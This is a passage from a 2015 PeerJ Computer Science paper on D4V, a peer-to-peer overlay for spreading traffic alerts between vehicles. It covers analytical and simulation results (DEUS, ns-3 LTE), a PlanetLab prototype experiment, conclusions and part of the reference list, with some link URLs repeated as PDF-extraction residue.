expressed as follows: n(s) = n(s − 1) + α j=1 ρ · Aj · (1 − x) ·  1 − n(s − 1) N (R) D j . (10) Note that the recursive analytical computation of {n(s)} stops when a pre-set peer discovery limiting number is reached. In Fig. 4, performance results predicted by the analytical model proposed above are compared with simulation results obtained with DEUS (described in more detail in Section ‘D4V performance evaluation’), considering scenarios with (a) 500 peers and (b) 1,000 peers. In both cases (a) and (b), peers are distributed within a square surface with side of length L = 6.53 km, with an initial peer list size with n(1) = l0 = 10 peers, a limiting number of discovered peers equal to 100, and x = 0.05. It can be observed that analytical performance results are very close to simulation results, so that one can conclude that the accuracy of the analytical framework is satisfactory. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 15/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 5 PMN as a function of the discovery step, considering (A) 1 and (B) 2 FIND NODES requests at each neighborhood discovery step. In order to investigate the impact of α, in Fig. 5 the Percentage of Missing Nodes (PMN) in the GBs of a peer, with respect to those actually present in the area, is shown, as a function of the discovery step, considering (a) α = 1 and (b) α = 2. In both cases, the number of active peers is set to 200. It can be observed that the agreement between simulation and analytical results is even higher than in Fig. 4. By observing the results in Figs. 5 and 4, it can be concluded that a small number of discovery steps (namely, 4) is sufficient, regardless of the value of α, to significantly reduce the PMN. D4V performance evaluation The performance evaluation of D4V has been mostly carried out by means of an extensive simulative analysis, complemented by a preliminary experimental evaluation of a D4V sys- tem prototype deployed on the PlanetLab global testbed. While a thorough performance evaluation of the proposed D4V system would require a wide range of (resource intensive) on-field experiments, we rely on the fact that discrete event simulations are deemed useful to provide a proof-of-concept in this domain (Stojmenovic, 2008). In particular, we focus on a 4G wireless communication scenario, based on the Long-Term Evolution (LTE) technology (Cox, 2012). Simulation methodology DEUS is an open source, Java-based, general-purpose discrete event simulation tool, which is particularly suitable for the application-level analysis of distributed systems with thousands of nodes, characterized by a high level of churn (node joins and departures) and reconfiguration of connections among nodes (Amoretti, Agosti & Zanichelli, 2009). On the other hand, ns-3 is a widely known open source tool for the discrete event simulation of Internet systems (focusing on low layers of the protocol stack, e.g., MAC and physical), which relies on high-quality contributions of the community to develop new models, to debug or to maintain existing ones, and to share results (ns-3 Development Team). In Amoretti et al. (2013), we describe a sound methodology to integrate DEUS (Amoretti, Agosti & Zanichelli, 2009) and ns-3 (ns-3 Development Team), leading Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 16/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 to a more accurate performance evaluation of large-scale mobile and distributed systems. The main steps of the co-simulation methodology proposed in Amoretti et al. (2013) can be summarized as follows: 1. given a complex system to be simulated, identify the main sub-system types, each one being characterized by specific networking parameters; 2. with ns-3: create detailed simulation models of the sub-systems (i.e., sub-models) and measure their characteristic transmission delays, taking into account both message payloads and proper headers; 3. with DEUS: simulate the whole distributed system, with refined scheduling of communication events, taking into account the transmission delays computed at step 2. Regarding step 2, we have used ns-3’s LENA LTE-EPC package,3 by modifying the C + + 3 We used the version released the 23rd of January 2013 (LTE-EPC Network Simulator). class which creates the logs for the Radio Link Control (RLC) protocol. The modified class logs a discretized Probability Density Function (PDF) of the RLC packet delay. The latter is then used to generate realistic packet delays in the DEUS-based simulations, using the well-known inversion method (Papoulis, 1991). For practical implementation purposes, the discretized PDF of the downlink RLC packet delay is approximated by a piecewise constant function, whose numerical inversion is straightforward and computationally inexpensive. We have simulated a D4V-based application deployed across the city of Parma, considering a number of vehicles that move over 100 km of realistic paths generated using the Google Maps API. Each simulated vehicle selects a different path and starts moving over it. Using the features provided by the Google Maps API, we have created a simple HTML & Javascript control page, which allows to monitor the time progression of the simulated system, where any peer can be selected to view its neighborhood: a few video demos are publicly available (Distributed System Group). The simulation covers 10 h of D4V system life (10000 virtual time units) with 20 SSs, 5 virtual paths with bad road surface (due to either ice, water, snow, or pothole), accident events characterized by a Poisson arrival process, and with different message types to disseminate information about sensed traffic data. Simulations with DEUS have been repeated with different seeds for the random number generator, to obtain a narrow I95 confidence interval. The performance results reported in Figs. 8–11 are obtained by averaging over the simulation runs, considering the whole set of simulated peers. The considered simulation set-up is characterized by the DGT configuration which gives the best performance in urban scenarios (according to a previous study (Picone, Amoretti & Zanichelli, 2011a)), which is summarized in the following, using the DGT description formalism defined in Section ‘Distributed Geographic Table’. Each peer has: K = 4 GBs, with the same thickness r = 0.5 km; a limiting number of discovered peers equal to 10; a region of interest of 12.5 km2; an adaptive discovery period ranging from 1.5 min to 6 min, depending on the number of new discovered peers during each iteration step. The discovery period of a peer is an increasing function of the degree of knowledge of its neighborhood, corresponding to the decrement of the number of new discovered peers in the same area of interest. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 17/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 6 Bird’s-eye view of the simulated scenario. The transmission delay of a DGT packet has been computed by simulating with ns-3 the sub-system illustrated in Fig. 6 (averaging over 20 simulation runs). To match the previously described DGT configuration (i.e., DGT peers having GBs that cover a circular region of interest with radius equal to 2 km), we consider a square region having side length l = 2 km, with a grid of nr = 10 roads (5 in the N-S direction, and 5 in the W-E direction) and vehicles running over them (with linear density δ). The total amount of DGT User Equipments (UEs) can be expressed as n = nrδl. Parallel roads are spaced by l/4 = 0.5 km. In the map, there are 16 large buildings with square footprint, and seven floor-tall. Within each building, there are nv/16 other randomly located UEs, where nv is the total number of UEs in all buildings. The path loss model is ns3::BuildingsPropagationLossModel. On top of each building, exactly in the middle, there is an Evolved NodeB (eNB), i.e., a base station which serves a subset of the n + nv UEs. 4 The configuration of the 4 Such a dense deployment of eNBs may appear to be quite optimistic, but it represents a realistic scenario for medium-term UE systems. eNBs includes FDD paired spectrum, with 50 Resource Blocks (RBs) for the uplink (which corresponds to a nominal transmission rate of 50 Mbps) and the same for the downlink—this is coherent with currently deployed LTE systems. DGT UEs use UDP to send four types of DGT packets to each other. The first type, called Descriptor (24 bytes), is for neighborhood consistency maintenance purposes. The second type of packet, the Lookup Request (20 bytes), is used to search for remote peers placed around a specified Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 18/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 7 PDFs of the uplink (A) and downlink (B) delays for DGT packets. location. The third packet type is the Lookup Response (500 bytes), which is sent by a DGT peer as a reply to a lookup request, if the peer owns the searched resource or information. Finally, the fourth type of packet is related to traffic information (66 bytes). All packet types have also a 12 byte header. We set an inter-packet interval of 50 ms for all types of DGT messages. Thus, the maximum and minimum rates are, respectively, 512 × 20 ≃ 10 kB/s and 32 × 20 = 0.64 kB/s. In a dynamic DGT scenario (the one simulated with DEUS), packets are not sent periodically—descriptors are sent only every ϵ meters; lookup requests (as well as lookup responses) are sent only when necessary; traffic information messages are sent only when something “interesting” can be communicated to the other peers (for example, a traffic jam or an incident). In order to simulate the presence of non-DGT traffic over LTE networks, we also include nv = 96 other UEs, transmitting and receiving VoIP packets (using UDP) with a remote host located in the Internet. These packets have a 12 byte header and a 13 byte payload, with inter-packet interval set to 20 ms (the AMR 4.75 kbps codec is considered). The PDF of the resulting uplink delay, shown in Fig. 7A, can be approximated as a Dirac delta function. The PDF of the downlink delay, shown in Fig. 7B, can instead be approximated with a piecewise constant function, with three levels. Such delay profiles scale from small scenarios to larger ones, as they refer to intra-GB communications only. A DGT message can be propagated across the whole city, from one peer to another, relayed by intermediate peers. Each message propagation would be affected only by the data traffic within the GB of the forwarding peer—where the obtained delay profiles apply. Parameters for large-scale analysis The following set of performance metrics has been considered in the DEUS-based simulations of the D4V system: • CP (dimensionless): Estimated Coverage Percentage of D4V messages (TrafficInfor- mation and SensorData) at a certain time of the simulation. It is evaluated as the ratio Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 19/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Table 1 Parameters affecting the performance of a D4V system. Symbol Description Values K Number of GBs 4 r Thickness of each GB 0.5 km ϵ Position update threshold [0.1;1] km ER Event range [1;10] km δ Peer spatial density [5;20] veh/km P Packet loss percentage [1;10] between the number of peers that actually received a specific message and the number of those which should have received it. • PVTJ (dimensionless): Average percentage of vehicles (with respect to the total number of vehicles) involved in a traffic jam. • DFE (dimension: (km)): the Distance From Event is the average distance from a traffic jam of interested vehicles which have not received the information about the traffic jam yet. The higher the DFE, the higher the security margin (and related time) to receive the message. • DR (dimension: (kB/s/peer)): average data rate per peer. Table 1 summarizes the values of the main parameters that affect the performance of the D4V system. Impact of ϵ The first step of the simulation-based D4V evaluation aims at analyzing the impact of the value of the threshold ϵ, considering two representative values for the peer spatial density δ (namely, 10 veh/km and 20 veh/km), an Event Range ER equal to 4 km, and a packet loss percentage P = 1%. As defined in Section ‘Distributed Geographic Table’, ϵ represents the minimum displacement threshold considered by a peer to notify its geographic position update to the peers in its neighborhood. Our performance analysis aims at evaluating the effects of the variation of the update frequency on the information dissemination and, consequently, on the system performance. In Fig. 8, the impact of ϵ on the considered performance metrics is evaluated. In particular, Fig. 8A, where the CP is investigated, shows that traffic information messages are highly distributed to active peers in the region of interest. As expected, a higher peer spatial density contributes to increase knowledge sharing, thus increasing the CP. In Fig. 8B, the PVTJ is investigated, showing the inherent robustness of D4V. In fact, even in the presence of a reduced update frequency, D4V can properly distribute traffic information, leaving only a small percentage of drivers in traffic jams. We remark that even with lower peer spatial densities (such as δ = 4 peers/km) the performance would not change, provided that ϵ is properly configured (as will be shown in Fig. 10B, discussed below). The effectiveness of the D4V approach is further shown by the DFE results in Fig. 8C. In particular, the DFE remains approximatively constant and very close to the dissemination range value of 4 km, confirming that peers that do not Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 20/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 8 Simulation results for different values of the position update threshold. receive a traffic message are those located very far from the traffic event, thus still having a high probability of receiving the alert on time. This analysis suggests that vehicles stuck in traffic jams are the ones really close to the traffic jam and with not enough time to react and change direction. From the results in Fig. 8D, it can be observed that a finer position update rate (i.e., a lower value of ϵ) and/or a higher peer spatial density increase DR. Impact of event range In Fig. 9, the same performance metrics of Fig. 8 are investigated as functions of ER, with ϵ = 1 km and P = 1%. The results in Figs. 9A and 9B show clearly that a short ER (as small as 1 km) affects the message distribution process, due to a lower margin between the traffic jam and the drivers. In this situation, peers may receive alert messages when they are too close to dangerous situations, thus becoming involved in the queue. In particular, we remark how a lower vehicle density worsens such a phenomenon due to the smaller number of peers available in their knowledge database which can redistribute traffic condition event messages. At the same time, it can be observed how there is no significant gap using ER values larger than 4 km for both peer density curves. In Fig. 9C, the DFE value for the considered configurations is shown as a function of the range. For comparison, the optimal distance from the event is also shown. The latter coincides with the value of the Event Range as, ideally, the minimum distance of peers which did not receive the traffic information message yet is clearly the range of interest. The obtained results show that Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 21/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 9 Results for different values of the dissemination range. within a 4 km Event Range, the DFE remains very close to the optimal bound, while it increasingly separates from it for higher ER values. This is quite reasonable, as the area to be covered increases with the square of the Event Range. Hence, drivers who do not receive the alert for a specific event are in any case sufficiently far from it and will receive the alert with enough time to react. Finally, an extended ER corresponds to an increased notification area and, consequently, to a larger number of interested drivers that may be contacted. However, as shown in Fig. 9D, this slightly affects the amount of exchanged messages. Impact of peer spatial density The third stage of the simulative analysis aims at evaluating the impact, on system performance, of the peer spatial density. In all considered cases, ϵ = 1 km, ER = 4 km, and P = 1%. The scenario is characterized by an initially growing number of active vehicles, followed by a stable phase without new joins or disconnections. The results in Fig. 10A confirm that the proposed solution copes with different peer spatial densities with no performance degradation, keeping the CP significantly high (between 98% and 100%) even in the case of very low density (5 peers/km), which could be quite critical for VANET-based applications. We recall that, if a mobile peer finds itself in a desert region, it will still be able to fill its external GB with remote peers, by requesting their contacts to the bootstrap node (described in Section ‘Distributed Geographic Table’), as if it is joining again the network with a new geographic location. Such a distributed knowledge Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 22/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 10 Simulation results for different peer densities. provides appropriate support to efficiently disseminate messages about traffic jams or sensed data. As already observed in Section ‘Impact of event range’, the results in Fig. 10C show that an increasing number of active peers maintains the DFE high and close to the dissemination range. This results in an accurate dissemination of traffic information messages that allows drivers to receive alert information on time, still sufficiently far from the dangerous location. In Fig. 10B, the percentages of vehicles blocked in a traffic jam, with and without D4V content dissemination, are directly compared. These results confirm that the D4V approach drastically reduces the number of involved vehicles that would otherwise grow significantly for increasing density. In Fig. 10D, the average data traffic per peer (dimension: (kB/s/peer)), required to maintain the DGT overlay and disseminate traffic information messages to other active neighbors, is shown as a function of the peer spatial density. Since UDP is the used transport protocol, there are no retransmissions in the presence of lost packets—more details can be found in Picone, Amoretti & Zanichelli (2011b). Here, we investigate the average bandwidth—estimated from simulative results, corrected considering the cost of headers—consumed in the best case (when the transmitted message is much longer than the IP header) and in the worst case (when the transmitted message has a size comparable to that of the IP header, e.g., a location update, which contains only a peer descriptor and Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 23/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 a location). Even if there is an unavoidable growth for increasing peer spatial densities, the amount of data exchanged by each peer remains limited. This behavior is associated with the fact, described in Section “Impact of event range”, that the D4V system uses an opportunistic content dissemination strategy. In fact, this approach tries to minimize the amount of transmitted packets, by forwarding them only to interested users, trying, at the same time, to reduce the number of duplicated messages. The considered values of peer spatial density are 5 veh/km, 10 veh/km, and 20 veh/km. Higher values would be neither realistic nor interesting, as they would mean that all vehicles on the roads run the DGT. A similar analysis has been carried out by Heep et al. (2013), regarding Overdrive—the most recent location-aware P2P overlay scheme for smart traffic applications (as anticipated in Section ‘Related work’). Their Geographic Unicast Message Success Rate (GUMSR) can be compared to our CP. Overdrive is characterized by GUMSR between 90% and 95%, with DR > 1 kB/s/peer. The D4V shows a CP > 95% with DR < 1 (kB/s/peer). In Overdrive, the bandwidth consumption depends on the flooding rate. In D4V, message dissemination is mostly affected by peer spatial density (for which GBs could be more or less filled) and by the dissemination range. As shown in Section ‘Impact of event range’, even large variations of the latter parameter keep DR significantly below 1 (kB/s). Moreover, in our analysis, we investigate the DFE of the 100-CP % of the peers that do not receive the notifications. The higher the DFE, the higher the distance between the event’s location and the peers that have not been notified, the higher the security margin. To summarize, in order to have a comprehensive behavior and performance evaluation of location-aware P2P overlay schemes, CP and DFE must be jointly investigated. Robustness In Fig. 11, the robustness is investigated by analyzing the impact of the packet loss percentage P on CP, PVTJ, DFE, and DR. In all cases, ϵ = 1 km and ER = 4 km. In the current simulator, there is no recovery procedure to verify whether a transmitted message has been correctly delivered and, if necessary, to retransmit it. This needs to be taken into account to properly interpret the obtained results, in particular for the dissemination of traffic information messages and the global robustness of the DGT approach. In Fig. 11A, the global CP is shown as a function of the packet loss percentage, confirming that peers maintain a detailed knowledge of traffic events (on average more than 90%) in the first GB. In Fig. 11B, the PVTJ appears as a slightly increasing function of P, given that some peers may not receive alerts on the dangerous event and could be stuck in a queue. The distributed knowledge provided and maintained by the DGT allows to inform a large number of drivers, thus keeping the number of queued vehicles really small. The robustness of D4V is also confirmed by results in Fig. 11C, showing that the peers that do not receive traffic information messages related to a dangerous event are considerably distant from the event’s location. Moreover, the DFE is almost independent of P. Finally, in Fig. 11D the DR is shown as a function of P. It can be observed that the DR is unavoidably lower than in the other scenarios, due to the lack of a recovery procedure for lost packets. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 24/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 11 Simulation results for different packet loss percentages. Vehicle speed analysis Finally, considering the behavioral model of a driver in proximity of a road stretch with a bad surface condition, that we have introduced in Section ‘Mobility Model’, in Fig. 12 we show the monitored speed for five virtual tracks with bad surface conditions for all drivers (including both the informed ones and those not informed). The observed results clearly show that a decreased speed is measured near the critical location (at distance zero), along with an increasing speed while moving away from it. Owing to this behavior, it can be concluded that the deployment of D4V would probably reduce the risk of accidents and nuisances, on account of the D4V-based information sharing among drivers, especially those approaching the dangerous event. Experimental evaluation The extensive simulative analysis of the DGT gave us valuable feedback for the develop- ment of a DGT Java library and a first prototype of the D4V traffic information system. The DGT library implements the core functionalities such as neighborhood and management, as well as GB maintenance. A D4V application layer uses such features to implement the content dissemination algorithm and the user interface to collect inputs related to a specific traffic event, and to show approaching dangerous situations. The development of the DGT library is based on the open source peer-to-peer middleware Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 25/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 12 Average of driver speed near road points with bad surface condition. called Sip2Peer (Sip2Peer), which provides SIP-based primitives for the implementation of any peer-to-peer overlay scheme and application. In order to properly measure the network performance, to understand if the results of the simulation analysis are confirmed in a real distributed environment, we deployed D4V nodes on PlanetLab,5 which is a global research network that supports the development of 5 https://www.planet-lab.org/ new network services. PlanetLab currently consists of about 1,089 nodes at 532 sites (the University of Parma contributes with 2 nodes). In detail, we deployed 50 D4V peers on 13 different PlanetLab servers, located in 13 different countries. Every 30 s, each node logs all the required information (e.g., geographic location, exchanged kbytes, received and sent messages) to analyze the behavior of the node. At the end of each experiment, a dedicated tool parses all available log files, to build a time line of the experiment made by steps of 30 s containing all the required statistics for the performance evaluation. All experiments have been run several times. Figure 13A illustrates the Coverage Percentage. The generation of traffic messages starts 400 s after the activation of a dedicated D4V event-generator node, in order to give them sufficient time to build the DGT overlay. Results show that the average value of CP is very high (close to 97%), and in particular significantly near the average value of our simulations (≃98%). The CP curve shows that when new messages are generated, the coverage percentage goes lightly down to lower values but after one or two time line steps (30/60 s) recovers to a high coverage percentage, thus confirming that the dissemination process and the neighborhood knowledge allow to efficiently distribute messages. Figure 13B shows the DFE of the PlanetLab deployment, considering a 4 km interest range ffor disseminated messages. The graph confirms that vehicles that did not receive the message are on average significantly far from the dangerous event, and with an Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 26/31 https://peerj.com/computer-science/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 13 PlanetLab experimental results: (A) Coverage Percentage; (B) Distance From Event (DFE). high probability have a sufficient margin to receive the message before approaching the potentially dangerous location, by changing their direction to reach their destination using a different route, or just adapting their vehicle speed (for example, in proximity of a portion of damaged road surface). CONCLUSIONS In this paper, we have introduced D4V, a scalable system for opportunistic dissemination of information gathered through commercial smartphones, from vehicle sensors and driver inputs. D4V relies on the potential of DGT, a P2P overlay network which unifies the concepts of geographical and virtual neighborhoods. Two key results have been presented. The first one is given by the derivation of an analytical framework to characterize the discovery procedure of the DGT proactive neighbor localization protocol. The outcome, namely the average number of newly discovered nodes at each step, can provide useful guidelines for the design of a DGT-based application to determine how to appropriately set the main system parameters in order to guarantee a desired missing node percentage. The second result is given by the design of an effective and efficient opportunistic dissemination strategy which relies on the DGT to distribute vehicular information and sensed data to interested drivers. Simulation results show that the proposed D4V system guarantees a high vehicular notification coverage, over a wide range of system parameters’ values, whilst generating limited control data traffic and coping reasonably well with significant packet losses. Hence, we are confident that D4V could be effectively used on the road to reduce the number of drivers involved in traffic jams, as well as to disseminate alert messages about potentially dangerous road stretches, thus allowing drivers to reduce risks and nuisances along their paths. Further work will investigate the optimization of opportunistic message dissemination at the minimum D4V message traffic load (e.g., by estimating vehicle trajectories). Moreover, we will investigate a global communication model which takes into account Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 27/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 both user mobility and available wireless network (Wi-Fi and cellular) coverage: this will likely improve the flexibility, accuracy, and reliability of D4V. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work of G Ferrari was partially supported under the one-year project “Cross-Network Effective Traffic Alerts Dissemination” (X-NETAD, Eureka Label E! 6252, 2011–2012), sponsored by the Ministry of Foreign Affairs (Italy) and The Israeli Industry Center for R&D (Israel) under the “Israel-Italy Joint Innovation Program for Industrial, Scientific and Technological Cooperation in R&D.” The work of Marco Picone is supported by Guglielmo srl, Reggio Emilia, Italy. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Ministry of Foreign Affairs. The Israeli Industry Center for R&D (Israel). Guglielmo srl, Reggio Emilia, Italy. Competing Interests The authors declare there are no competing interests. Author Contributions • Marco Picone conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • Michele Amoretti conceived and designed the experiments, analyzed the data, con- tributed reagents/materials/analysis tools, wrote the paper, performed the computation work. • Gianluigi Ferrari and Francesco Zanichelli conceived and designed the experiments, reviewed drafts of the paper. Data Availability The following information was supplied regarding the deposition of related data: https://github.com/dsg-unipr/deus/. REFERENCES Aberer K, Alima LO, Ghodsi A, Girdzijauskas S, Haridi S, Hauswirth M. 2005. The essence of P2P: a reference architecture for overlay networks. In: 5th IEEE Int.’l conference on peer-to-peer computing (P2P 2005). Konstanz, Germany. Amoretti M. 2009. A survey of peer-to-peer overlay schemes: effectiveness, efficiency and security. Recent Patents on Computer Science 2(3):195–213 DOI 10.2174/2213275910902030195. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 28/31 https://peerj.com/computer-science/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ http://dx.doi.org/10.2174/2213275910902030195 http://dx.doi.org/10.7717/peerj-cs.15 Amoretti M, Agosti M, Zanichelli F. 2009. DEUS: a discrete event universal simulator. In: 2nd ICST/ACM Int.’l conference on simulation tools and techniques (SIMUTools 2009). Roma, Italy. Amoretti M, Picone M, Zanichelli F, Ferrari G. 2013. Simulating mobile and distributed systems with DEUS and ns-3. In: International conference on high performance computing and simulation 2013. Helsinki, Finland. Bronsted J, Kristensen LM. 2006. Specification and performance evaluation of two zone dissemination protocols for vehicular ad-hoc networks. In: 39th annual simulation symposium, Huntsville. Alabama, USA. Buchanan M. 2003. Nexus: small worlds and the groundbreaking theory of networks. New York: W. W. Norton & Company. Burke J, Estrin D, Hansen M, Parker A, Ramanathan N, Reddy S, Srivastava MB. 2006. Participatory sensing. In: WSW 2006. Boulder, Colorado, USA. Caliskan M, Graupner D, Mauve M. 2006. Decentralized discovery of free parking places. In: 3rd Int.’l workshop on vehicular ad hoc networks. Los Angeles, California, USA. Cox C. 2012. An introduction to LTE: LTE, LTE-advanced, SAE and 4G mobile communications. Hoboken: Wiley. Dietzel S, Petit J, Kargl F, Scheuermann B. 2014. In-network aggregation for vehicular ad hoc networks. IEEE Communications Surveys & Tutorials 16(4):1909–1932 DOI 10.1109/COMST.2014.2320091. Distributed System Group. D4V Videos. Available at http://dsg.ce.unipr.it/d4v. Du L, Dao H. 2015. Information dissemination delay in vehicle-to-vehicle communication networks in a traffic stream. IEEE Transactions on Intelligent Transportation Systems 16(1):66–80 DOI 10.1109/TITS.2014.2326331. eMule project. Homepage. Available at http://www.emule-project.net. Fewell MP. 2006. Area of common overlap of three circles. Tech. Report of the Department of Defence, Australian Government. Fiore M, Harri J, Filali F, Bonnet F. 2009. Vehicular mobility simulation with VanetMobiSim. Simulation 87(4):275–300 DOI 10.1177/0037549709345997. Fujiki T, Kirimura M, Umedu T, Higashino T. 2007. Efficient acquisition of local traffic information using inter-vehicle communication with queries. In: 10th Int.’l IEEE conference on intelligent transportation systems (ITCS ’07). Seattle, Washington, USA. Gerla M, Kleinrock L. 2011. Vehicular networks and the future of the mobile internet. Computer Networks 55(2):457–469 DOI 10.1016/j.comnet.2010.10.015. Granovetter M. 1973. The strength of weak ties. American Journal of Sociology 78(6):1360–1380 DOI 10.1086/225469. Hadaller D, Keshav S, Brecht T, Agarwal S. 2007. Vehicular opportunistic communication under the microscope. In: Int.’l conference on mobile systems, applications and services (MobiSys). San Juan, Puerto Rico. Han M, Moon S, Lee Y, Jang K, Lee D. 2008. Evaluation of VoIP quality over WiBro. In: Passive and active measurement conference (PAM). Cleveland, Ohio, USA. Harri J, Filali F, Bonnet C. 2005. A framework for mobility models generation and its application to inter-vehicular networks. In: 3rd IEEE Int.’l workshop on mobility management and wireless access. Cologne, Germany. Hartenstein H, Laberteaux K. 2009. VANET vehicular applications and inter-networking technologies. Hoboken: Wiley. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 29/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/COMST.2014.2320091 http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dsg.ce.unipr.it/d4v http://dx.doi.org/10.1109/TITS.2014.2326331 http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://dx.doi.org/10.1177/0037549709345997 http://dx.doi.org/10.1016/j.comnet.2010.10.015 http://dx.doi.org/10.1086/225469 http://dx.doi.org/10.7717/peerj-cs.15 Heep B, Florian M, Volz J, Baumgart I. 2013. OverDrive: an overlay-based geocast service for smart traffic applications. In: 10th annual conference on wireless on-demand network systems and services (WONS). Banff, Alberta, Canada. Hull B, Bychkovsky V, Zhang Y, Chen K, Goraczko M, Miu A, Shih E, Balakrishnan H, Madden S. 2006. Cartel: a distributed mobile sensor computing system. In: 4th ACM conference on embedded networked sensor systems (SenSys). Boulder, Colorado, USA. Jedrzej R, Scheuermann B, Koegel M, Mauve M. 2009. PeerTIS: a peer-to-peer traffic information system. In: Int.’l conference on mobile computing and networking. Beijing, China. Jiang D, Taliwal V, Meier A, Holfelder W, Herrtwich R. 2006. Design of 5.9 GHz DSRC-based vehicular safety communication. IEEE Wireless Communications 13(5):36–43 DOI 10.1109/WC-M.2006.250356. Krauss S, Wagner P, Gawron C. 1997. Metastable states in a microscopic model of traffic flow. Physical Review E 55:55–97 DOI 10.1103/PhysRevE.55.5597. Lee U, Gerla M. 2010. A survey of urban vehicular sensing platforms. Computer Networks 54(4):527–544 DOI 10.1016/j.comnet.2009.07.011. Lee U, Magistretti E, Zhou B, Gerla M, Bellavista P, Corradi A. 2006. MobEyes: smart mobs for urban monitoring with vehicular sensor networks. IEEE Wireless Communications 13(5):52–57 DOI 10.1109/WC-M.2006.250358. Leontiadis I, Mascolo C. 2007. Opportunistic spatio-temporal dissemination system for vehicular networks. In: Int.’l conference on mobile systems, applications and services (MobiSys). San 